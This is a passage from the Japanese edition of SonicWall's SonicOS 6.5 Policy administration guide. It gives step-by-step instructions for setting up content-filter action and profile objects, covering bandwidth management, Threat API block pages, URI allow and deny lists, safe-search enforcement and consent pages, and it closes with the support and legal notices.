1 「操作設定」 で、 「帯域幅管理」 ボタンを選択します。

重要 : CFS 動作帯域幅オブジェク トは、 「オブジェク ト > 帯域幅オブジェク ト」 ページで作成され

る帯域幅オブジェ ク ト と似ていますが、 同じものではありません。 CFS 動作 BWM オブジェ ク ト

は、 「オブジェ ク ト > 帯域幅オブジェ ク ト」 ページに表示されません。 また、 BWM 帯域幅オブ

ジェク トは、 「オブジェク ト > コンテンツ フ ィルタ オブジェク ト」 ページに表示されません。

メモ : 帯域幅管理の情報については、 「SonicOS セキュ リテ ィ設定」 の技術文書の 「フ ァ イア

ウォール設定 > 帯域幅管理」 の下の 「帯域幅の設定」 セクシ ョ ンを参照して く ださい。 帯域幅

管理オブジェク トについては、 帯域幅オブジェク トの設定 (219 ページ) を参照して ください。

重要 : CFS 動作帯域幅オブジェク トを作成するには、 帯域幅管理を有効にする必要があります。

SonicWall SonicOS 6.5 ポリシー管理

コンテンツ フ ィルタ オブジェク トの設定247

2 「帯域幅統合方式」 ドロップダウン メニューから、 BWM オブジェク ト を適用する方法を選択し

ます。

• ポリシー毎 (既定)

• 動作毎

3 送信ト ラフ ィ ックで BWM を有効にするには、 「送信帯域幅管理を有効にする」 チェ ックボック

スをオンにします。 このオプシ ョ ンは、 既定では選択されていません。

「帯域幅オブジェ ク ト」 ド ロ ップダウン メニューと 「帯域幅使用状況の追跡を有効にする」

チェ ッ クボックスが有効になります。

a 「帯域幅オブジェク ト」 ドロップダウン メニューで、 次のどちらかを選択します。

• 既存の BWM オブジェク ト。

• 「帯域幅オブジェ ク トの作成」 。 「帯域幅オブジェ ク トの追加」 ダイアログが表示されます。 新しい帯域幅オブジェ ク トの作成については、 帯域幅オブジェ ク トの設定 (220 ページ) を参照して ください。

4 受信ト ラフ ィ ックで BWM を有効にするには、 「受信帯域幅管理を有効にする」 チェ ックボック

スをオンにします。 このオプシ ョ ンは、 既定では選択されていません。

「帯域幅オブジェク ト」 ドロップダウン メニューが有効になります。

a 「帯域幅オブジェク ト」 ドロップダウン メニューで、 次のどちらかを選択します。

• 既存の BWM オブジェク ト。

• 「帯域幅オブジェ ク トの作成」 。 「帯域幅オブジェ ク トの追加」 ダイアログが表示されます。 新しい帯域幅オブジェ ク トの作成については、 帯域幅オブジェ ク トの設定 (220 ページ) を参照して ください。

5 帯域幅使用状況を追跡にするには、 「帯域幅使用状況の追跡を有効にする」 チェ ッ クボックスをオンにします。 このオプシ ョ ンは、 既定では選択されていません。

メモ : 「送信帯域幅管理を有効にする」 または 「受信帯域幅管理を有効にする」 (またはこ

の両方) を選択し、 「帯域幅使用状況の追跡を有効にする 」 を有効にする必要があります。

SonicWall SonicOS 6.5 ポリシー管理

コンテンツ フ ィルタ オブジェク トの設定248

脅威 API オプシ ョ ン

「CFS 動作オブジェク トの追加」 ダイアログにこの画面が表示されます。 ダイアログを開く には、 管

理 ビューを選択し、 「ポリシー | オブジェク ト > コンテンツ フ ィルタ オブジェク ト」 を開き、 「CFS動作オブジェ ク ト」 ボタンを選択して 「CFS 動作オブジェ ク ト」 画面を表示し、 ページ上部の 「追

加」 ボタンを選択します。

脅威リストに含まれる URL を遮断するポリシーを追加するには:

1 「操作設定」 で、 「脅威 API」 ボタンを選択します。

2 既定のページが既に定義されていますが、 遮断されたサイ トにアクセスしよ う と したときにユーザに表示されるウェブ ページは全面的にカスタマイズできます。 または、 ページを独自に

作成することもできます。 サイ トが遮断されたときに表示されるページを作成するには:

• プレビューを表示するには、 「プレビュー」 ボタンを選択します。

• 確認のダイアログで、 「OK」 を選択します。

重要 : 脅威 API は、 設定前に有効にする必要があります。 脅威 API とその有効化方法の詳細につ

いては、 『SonicOS Threat API Reference Guide』 を参照して ください。

SonicWall SonicOS 6.5 ポリシー管理

コンテンツ フ ィルタ オブジェク トの設定249

与えられたコード を変更していなければ、 「プレビュー」 ボタンを選択すると既定のウェブ ページが表示されます。 ウェブサイ トの URL、 クライアン ト IP アドレス、 遮断ポ

リシー、 および遮断の理由が、 確認入力用フ ィールド と共に表示されます。

• 「脅威 API 遮断ページ」 フ ィールドからすべてのコンテンツを削除するには、 「消去」 ボ

タンを選択します。

• 既定の確認ページ メ ッセージに戻すには、 「既定」 ボタンを選択します。

CFS 動作オブジェク トの編集

CFS 動作オブジェク ト を編集するには:

1 管理ビューで、 「ポリシー | オブジェク ト > コンテンツ フ ィルタ オブジェク ト」 に移動します。

2 「CFS 動作オブジェク ト」 ボタンを選択して、 「CFS 動作オブジェク ト」 画面を表示します。

3 編集する CFS 動作 オブジェク トの 「編集」 アイコンをクリ ックします。 「CFS 動作オブジェク ト

の編集」 ダイアログが表示されます。 このダイアログは、 「CFS 動作オブジェ ク トの追加」 ダ

イアログと同じです。

4 変更を行うには、 CFS 動作オブジェク トの設定 (240 ページ) の説明に従って ください。

CFS 動作オブジェク トの削除

CFS 動作オブジェク ト を削除するには:

1 管理ビューで、 「ポリシー | オブジェク ト > コンテンツ フ ィルタ オブジェク ト」 に移動します。

2 「CFS 動作オブジェク ト」 ボタンを選択して、 「CFS 動作オブジェク ト」 画面を表示します。

3 以下のいずれかを実行します。

• 削除する動作オブジェク トの 「削除」 アイコンをクリ ッ クします。

• 削除する 1 つ以上の動作オブジェク トのチェ ックボックスをオンにします。 「削除」 ボタ

ンを選択し、 「選択した項目の削除」 を選択します。

すべての CFS 動作オブジェク ト を削除するには:

1 「削除」 ボタンを選択し、 「すべて削除」 を選択します。 既定のオブジェク トである CFS DefaultAction を除き、 すべての CFS 動作オブジェク トが削除されます。

SonicWall SonicOS 6.5 ポリシー管理

コンテンツ フ ィルタ オブジェク トの設定250

CFS プロファイルオブジェク トの管理

トピック :

• CFS プロファイル オブジェク ト テーブルについて (251 ページ)

• CFS プロファイル オブジェク トの設定 (252 ページ)

• CFS プロファイル オブジェク トの編集 (257 ページ)

• CFS プロファイル オブジェク トの削除 (257 ページ)

CFS プロファイル オブジェク ト テーブルについて

名前CFS プロフ ァ イル オブジ ェ ク トの名前。 既定の名前は CFS Default Profile です。 既定のオブジェク トは編集可能ですが、 削除はできません。

許可 URI リス ト 許可リス トに記載された URI リス ト オブジェク トの名前。

禁止 URI リス ト 禁止リス トに記載された URI リス ト オブジェク トの名前。

遮断種別 CFS プロファイル オブジェク トによって遮断されるすべての種別の名前。

パスワード種別CFS プロフ ァイル オブジェ ク トによってパスワードが要求されるすべての種

別の名前。

確認種別CFS プロフ ァ イル オブジェ ク ト によって確認が要求されるすべての種別の

名前。

帯域幅管理種別この CFS プロファイル オブジェ ク トによって制御される帯域幅管理のすべて

の種別の名前。

許可種別 CFS プロファイル オブジェク トによって許可されるすべての種別の名前。

設定 テーブルの各項目に対する 「編集」 アイコンと 「削除」 アイコンがあります。

SonicWall SonicOS 6.5 ポリシー管理

コンテンツ フ ィルタ オブジェク トの設定251

CFS プロファイル オブジェク トの設定

既定の CFS プロファイル オブジェク トである CFS Default Profile は、 SonicOS によって作成されます。

この CFS プロファイル オブジェク トは、 設定および編集は可能ですが、 削除することはできません。

CFS プロファイル オブジェク トの設定:

1 管理ビューで、 「ポリシー | オブジェク ト > コンテンツ フ ィルタ オブジェク ト」 に移動します。

2 「CFS プロファイルオブジェク ト」 ボタンを選択して、 「CFS プロファイルオブジェク ト」 画面

を表示します。

3 ページの上部にある 「追加」 ボタンを選択します。 「CFS プロファイル オブジェク トの追加」

ダイアログが表示されます。

4 「設定」 画面で、 「名前」 フ ィールドに CFS プロファイル オブジェク トの名前を入力します。

SonicWall SonicOS 6.5 ポリシー管理

コンテンツ フ ィルタ オブジェク トの設定252

5 「許可 URI リスト」 ドロップダウン メニューから、 無制限のアクセスを許可する URI が記載され

た URI リス ト オブジェク ト を選択し、 このリス ト をホワイ ト リス ト と して扱います。

• 「なし」 (既定)

• URI リス ト オブジェク トの名前。

• 「新しい URI リス ト オブジェク トの作成」 。 このオプシ ョ ンを選択すると、 「CFS URI リス ト オブジェク トの追加」 ダイアログが表示されます。 URI リス ト オブジェク トの作成

方法については、 URI リス ト オブジェク トの設定 (233 ページ) を参照して ください。

6 「禁止 URI リスト」 ドロップダウン メニューから、 アクセスをいっさい認めない URI が記載され

た URI リス ト オブジェク ト を選択し、 このリス ト をブラック リス ト と して扱います。

• 「なし」 (既定)

• URI リス ト オブジェク トの名前。

• 「新しい URI リス ト オブジェク トの作成」 。 このオプシ ョ ンを選択すると、 「CFS URI リス ト オブジェク トの追加」 ダイアログが表示されます。 URI リス ト オブジェク トの作成

方法については、 URI リス ト オブジェク トの設定 (233 ページ) を参照して ください。

7 「URI リストの検索順序」 ドロップダウン メニューから、 フ ィルタリング中に 初に検索される

URI リス ト を選択します。

• 「許可 URI リス ト を優先」 (既定)

• 「禁止 URI リス ト を優先」

8 「禁止 URI リストに対する操作」 ドロップダウン メニューから、 禁止リストにある URI が出現し

た場合に実行する動作を選択します。

9 「種別の設定」 テーブルには、 芸術/エンターテイメント、 ビジネス、 教育、 旅行、 武器、 ショ ッ

ピングなど、 すべての URI 種別が記載されています。 種別ごとの動作ではな く、 すべての URIに共通して実行される動作を定義できます。 リス ト を下へスクロールしながら、 各種別のドロップダウン メニューから動作を選択します。

• すべての種別を同じ動作に変更するには:

1) 「操作」 ドロップダウン メニューから動作を選択します。

2) 「すべてに設定」 ボタンを選択します。

• すべての種別を既定の動作にリセッ トするには、 「既定」 ボタンを選択します。

遮断 (既定)CFS 動作オブジェク ト用に設定された遮断ページが、 サイ トにアクセスしよ

う と したユーザに表示されます。

確認 CFS 動作オブジェク ト用に設定された確認ページが、 サイ トにアクセスしよ

う と したユーザに表示されます。 ユーザにはアクセスの意思確認が求められます。

パスワード CFS 動作オブジェ ク ト用に設定されたパスワード ページが、 サイ トにアク

セスしよ う と したユーザに表示されます。 ユーザは、 サイ トに入るために有効なパスワードを入力する必要があります。

許可 遮断 帯域幅管理 確認 パスワード

メモ :既定では、 種別 1 ~ 12 および種別 59 が遮断され、 残りの種別は許可されています。

SonicWall SonicOS 6.5 ポリシー管理

コンテンツ フ ィルタ オブジェク トの設定253

10 スマート フ ィルタ とセーフ サーチのオプシ ョ ンを有効にするには、 「詳細」 ボタンを選択し

ます。 この画面でオプシ ョ ンを設定する方法については、 詳細画面 (254 ページ) を参照して く

ださい。

11 ウェブの時限閲覧に関する規約を設定するには、 「時限閲覧規約」 ボタンを選択します。 この画面でオプシ ョ ンを設定する方法については、 規約画面 (255 ページ) を参照して ください。

12 「追加」 を選択します。 「CFS プロファイル オブジェク ト」 テーブルが更新されます。

13 「キャンセル」 を選択して、 「CFS プロファイル オブジェク トの追加」 ダイアログを閉じます。

詳細画面

この画面は、 「CFS プロファイル オブジェク トの追加」 ダイアログの 3 つの画面の 1 つです。 ダイア

ログを開く には、 管理 ビューを選択し、 「ポリシー | オブジェク ト > コンテンツ フ ィルタ オブジェ

ク ト」 を開き、 「CFS プロファイル オブジェ ク ト」 ボタンを選択して 「CFS プロファイルオブジェ ク

ト」 画面を表示し、 ページ上部の 「追加」 ボタンを選択します。 「詳細設定」 を選択します。

1 Google 翻訳 (https://translate.google.com) 内の埋め込み URL を検出し、 埋め込み URI をフ ィルタ リングするには、 「埋め込み URI に対してスマート フ ィルタを有効にする」 チェ ッ ク

ボックスをオンにします。

2 以下のウェブサイ トのいずれかで検索するときにセーフ サーチを適用するには、 「セーフ サー

チ強制を有効にする」 チェ ッ クボックスをオンにします。

メモ :既定では、 すべてのオプシ ョ ンがオフになっています。

重要 : この機能が動作するには、 クライアン ト DPI-SSL のコンテンツ フ ィルタが有効化さ

れている必要があります。

メモ : この機能は、 Google にのみ適用されます。 対象となるのは、 現在レーテ ィ ングが

済んでいる埋め込みウェブサイ トです。

SonicWall SonicOS 6.5 ポリシー管理

コンテンツ フ ィルタ オブジェク トの設定254

• www.yahoo.com

• www.ask.com

• www.dogpile.com

• www.lycos.com

3 脅威 API を有効にするには、 「脅威 API 強制を有効にする」 チェ ックボックスをオンにします。

4 Google 用のセーフ サーチ オプションを各 CFS ポリシーとそれに対応する CFS 動作に優先して適用

するには、 「 「Google セーフ サーチ強制」 を有効にする」 チェ ックボックスを選択します。

5 YouTube に制限付きモード (安全な検索) でアクセスするには、 「 「YouTube 制限付きモード」 を

有効にする」 チェ ッ クボックスを選択します。

6 Bing 用のセーフ サーチ オプシ ョ ンを各 CFS ポリシーとそれに対応する CFS 動作に優先して適用

するには、 「 「Bing セーフ サーチ強制」 を有効にする」 チェ ッ クボックスを選択します。

規約画面

この画面は、 「CFS プロファイル オブジェク トの追加」 ダイアログの 3 つの画面の 1 つです。 ダイア

ログを開く には、 管理 ビューを選択し、 「ポリシー | オブジェク ト > コンテンツ フ ィルタ オブジェ

ク ト」 を開き、 「CFS プロファイル オブジェ ク ト」 ボタンを選択して 「CFS プロファイルオブジェ ク

ト」 画面を表示し、 ページ上部の 「追加」 ボタンを選択します。 次に、 「規約」 を選択します。

メモ : この強制は、 ポリシー レベルでは設定できません。 この機能では、 HTTPS サイ ト

への DNS リダイレクシ ョ ンが使用されるためです。 HTTPS サイ トについては、 クライアン

ト DPI-SSL コンテンツ フ ィルタが有効化されている必要があります。

メモ : SonicOS が 初の脅威リストを受信したときに作成する脅威 URI リスト オブジェク ト

は、 「脅威 API 強制を有効にする」 チェ ックボックスをオンにすることで参照されます。

メモ : 通常、 セーフ サーチは自動的に適用され、 Google によって管理されますが、 この

オプシ ョ ンをオンにすると、 SonicOS は DNS 応答の中の Google ド メ インを、 Google セー

フ サーチ仮想 IP アドレスに書き換えます。

メモ : この機能は、 クライアン ト ホス トの DNS キャ ッシュが更新されるまで反映されま

せん。

メモ : YouTube では、 ユーザやその他の警告によって報告された不適切なコンテンツを含

む可能性のある動画を除外する新機能が提供されています。 この機能が有効化されていると、 SonicOS は YouTube ド メインの DNS 応答をセーフ サーチ仮想 IP アドレスに書き換え

ます。

メモ : この機能は、 クライアン ト ホス トの DNS キャ ッシュが更新されるまで反映されま

せん。

メ モ : この機能が有効化されている と、 SonicOS は Bing ド メ インの DNS 応答をセーフ

サーチ仮想 IP アドレスに書き換えます。

メモ : この機能は、 クライアン ト ホス トの DNS キャ ッシュが更新されるまで反映されま

せん。

メモ : 時限閲覧規約は、 HTTP 要求に対してのみ機能します。 HTTPS 要求は、 「確認」 (同意) ペー

ジにはリダイレク トできません。

SonicWall SonicOS 6.5 ポリシー管理

コンテンツ フ ィルタ オブジェク トの設定255

1 ユーザがアクセス前に同意が必要なサイ ト を訪れたときに 「時限閲覧規約」 (確認) ページを表

示するには、 「規約表示を有効にする」 チェ ッ クボッ クスを選択します。 このオプシ ョ ンは、既定では選択されていません。

このオプシ ョ ンを選択すると、 他のオプシ ョ ンが使用できるようになります。

2 「時限閲覧規約」 ページが表示される時間の期限をユーザに通知するには、 無動作時間の長さを 「ユーザ無動作タイムアウト (分)」 フ ィールドに入力します。 無動作時間の 小値は 1 分、

大値は 9999 分、 既定値は 15 分です。

3 規約への同意が必要なウェブサイ トにユーザが移動したときにそのユーザをリダイレク トするウェブサイ トの URL を 「規約選択画面 (検閲の選択)」 フ ィールドに入力します。 「時限閲覧規

約」 ページは、 次の条件を満たす必要があります。

• ウェブ サーバ上に存在し、 ネッ トワーク上でユーザが URI を通じてアクセス可能。

• SonicWall 装置内の以下の 2 つのページへのリンクが含まれる。 このリンクを選択すると、

ユーザが希望するアクセスの種別がファイアウォールに通知されます。

• フ ィルタを使用しないアクセス: <装置の LAN IP アドレス>/iAccept.html

• フ ィルタを使用するアクセス: <装置の LAN IP アドレス>/iAcceptFilter.html

4 強制的な検閲を要求するウェブサイ トにユーザが移動したときにそのユーザをリダイレク トするウェブサイ トの URL を 「規約承諾画面 (検閲を強制にする)」 フ ィールドに入力します。 「時

限閲覧規約」 ページは、 次の条件を満たす必要があります。

• ウェブ サーバ上に存在し、 ネッ トワーク上でユーザが URI を通じてアクセス可能。

• SonicWall 装置内の <装置の LAN IP アドレス>/iAcceptFilter.html ページへのリン

クが含まれる。 これは、 ユーザが閲覧の検閲を承諾することをフ ァイアウォールに通知します。

5 「強制フ ィルタ アドレス」 ドロップダウン メニューから、 強制的な検閲を要求する設定済み IPアドレスが含まれるアドレス オブジェク ト を選択します。

メモ :規約 (確認) ページの設定については、 確認オプシ ョ ン (245 ページ) を参照して くだ

さい。

SonicWall SonicOS 6.5 ポリシー管理

コンテンツ フ ィルタ オブジェク トの設定256

CFS プロファイル オブジェク トの編集

CFS プロファイル オブジェク ト を編集するには:

1 管理ビューで、 「ポリシー | オブジェク ト > コンテンツ フ ィルタ オブジェク ト」 に移動します。

2 「CFS プロファイルオブジェク ト」 ボタンを選択して、 「CFS プロファイルオブジェク ト」 画面

を表示します。

3 編集する CFS プロファイル オブジェク トの 「編集」 アイコンをクリ ックします。 「CFS プロファ

イル オブジェク トの編集」 ダイアログが表示されます。 このダイアログは、 「CFS プロファイ

ル オブジェク トの追加」 ダイアログと同じです。

4 変更を行うには、 CFS プロファイル オブジェク トの設定 (252 ページ) の説明に従って ください。

CFS プロファイル オブジェク トの削除

CFS プロファイル オブジェク ト を削除するには:

1 管理ビューで、 「ポリシー | オブジェク ト > コンテンツ フ ィルタ オブジェク ト」 に移動します。

2 「CFS プロファイルオブジェク ト」 ボタンを選択して、 「CFS プロファイルオブジェク ト」 画面

を表示します。

3 以下のいずれかを実行します。

• 削除するプロファイル オブジェク トの 「削除」 アイコンをクリ ックします。

• 削除する 1 つ以上のプロファイル オブジェク トのチェ ックボックスをオンにします。 「削

除」 ボタンを選択し、 「選択した項目の削除」 を選択します。

すべての CFS プロファイル オブジェク ト を削除するには:

1 「削除」 ボタンを選択し、 「すべて削除」 を選択します。 既定のオブジェク トである CFS DefaultProfile を除き、 すべての CFS プロファイル オブジェク トが削除されます。

コンテンツ フ ィルタ オブジェク トの適用コンテンツ フ ィルタ オブジェク トの設定が終わった後で、 オブジェク ト をコンテンツ フ ィルタ ポリ

シーに適用する必要があります。 コンテンツ フ ィルタの設定は、 「セキュ リテ ィの設定 | セキュ リ

テ ィ サービス > コンテンツ フ ィルタ」 ページで行えます ( 「SonicOS セキュ リテ ィ設定」 の技術ド

キュ メン トの 「コンテンツ フ ィルタ リング サービスの設定」 セクシ ョ ンを参照)。

SonicWall SonicOS 6.5 ポリシー管理

コンテンツ フ ィルタ オブジェク トの設定257

SonicWall SonicOS 6.5 ポリシー管理

サポート

第 3 部

258

サポート

• SonicWall サポート

12

SonicWall サポート

有効なメンテナンス契約が付属する SonicWall 製品をご購入になったお客様や、 ト ライアル バージ ョ

ンをお持ちのお客様は、 テクニカル サポートを利用できます。

サポート ポータルには、 問題を自主的にすばやく解決するために使用できるセルフヘルプ ツールが

あり、 24 時間 365 日ご利用いただけます。 サポート ポータルにアクセスするには、

https://www.sonicwall.com/ja-jp/support に移動します。

サポート ポータルでは、 次のことを実行できます。

• ナレッジ ベースの記事や技術文書を閲覧する。

• ビデオ チュート リアルを視聴する。

• MySonicWall にアクセスする。

• SonicWall のプロフェ ッシ ョナル サービスに関して情報を得る。

• SonicWall サポート サービスおよび保証に関する情報を確認する。

• ト レーニングや認定プログラムに登録する。

• テクニカル サポートやカスタマー サービスを要求する。

SonicWall サポートへの連絡方法は、 https://www.sonicwall.com/ja-jp/support/contact-support をご覧くだ

さい。

SonicWall SonicOS 6.5 ポリシー管理

SonicWall サポート259

このドキュメン トについて

SonicOS ポリシー更新日 - 2017 年 10 月ソフ トウェア バージ ョ ン - 6.5232-001807-00 Rev A

Copyright © 2017 SonicWall Inc. All rights reserved.

SonicWall は、 SonicWall Inc. および/またはその関連会社の米国および/またはその他の国における商標または登録商標です。 そ

の他の商標または登録商標は、 各社の所有物です。

本文書の情報は SonicWall Inc. およびその関連会社の製品に関して提供されています。 明示的または暗示的、 禁反言にかかわら

ず、 知的財産権に対するいかなるライセンスも、 本文書または SonicWall 製品の販売に関して付与されないものとします。 本製

品のライセンス契約で定義される契約条件で明示的に規定される場合を除き、 SonicWall および/またはその関連会社は一切の

責任を負わず、 商品性、 特定目的への適合性、 あるいは権利を侵害しないことの暗示的な保証を含む (ただしこれに限定され

ない)、 製品に関する明示的、 暗示的、 または法定的な責任を放棄します。 いかなる場合においても、 SonicWall および/または

その関連会社が事前にこのような損害の可能性を認識していた場合でも、 SonicWall および/またはその関連会社は、 本文書の

使用または使用できないことから生じる、 直接的、 間接的、 結果的、 懲罰的、 特殊的、 または付随的な損害 (利益の損失、 事

業の中断、 または情報の損失を含むが、 これに限定されない) について一切の責任を負わないものとします。 SonicWall および/またはその関連会社は、 本文書の内容の正確性または完全性に関していかなる表明または保証も行いません。 また、 事前の通

知な く、 いつでも仕様および製品説明を変更する権利を留保するものとします。 SonicWall Inc. および/またはその関連会社は、

本文書に記載されている情報を更新する義務を負わないものとします。

詳細については、 https://www.sonicwall.com/ja-jp/legal を参照して ください。

エンド ユーザー製品契約

SonicWall エンド ユーザ製品利用規を参照する場合は、 以下に移動して ください。

https://www.sonicwall.com/ja-jp/legal/license-agreements。 お客様の地域に適用される EUPA を表示するには、 地理的位置に応じ

て言語を選択して ください。

オープン ソース コード

SonicWall では、 該当する場合は、 GPL、 LGPL、 AGPL のような制限付きライセンスによるオープン ソース コードについて、 コ

ンピュータで読み取り可能なコピーをライセンス要件に従って提供できます。 コンピュータで読み取り可能なコピーを入手す

るには、 "SonicWall Inc." を受取人とする 25.00 米ドルの支払保証小切手または郵便為替と共に、 書面による要求を以下の宛先ま

でお送り ください。

General Public License Source Code Request SonicWall Inc. Attn: Jennifer Anderson5455 Great America ParkwaySanta Clara, CA 95054

凡例

警告: 物的損害、 けが、 または死亡に至る可能性があることを示しています。

注意: 手順に従わないとハードウェアの破損やデータの消失が生じる恐れがあることを示しています。

重要、 メモ、 ヒン ト、 モバイル、 またはビデオ: 補足情報があることを示す表示です。

SonicWall SonicOS 6.5 ポリシー管理

SonicWall サポート260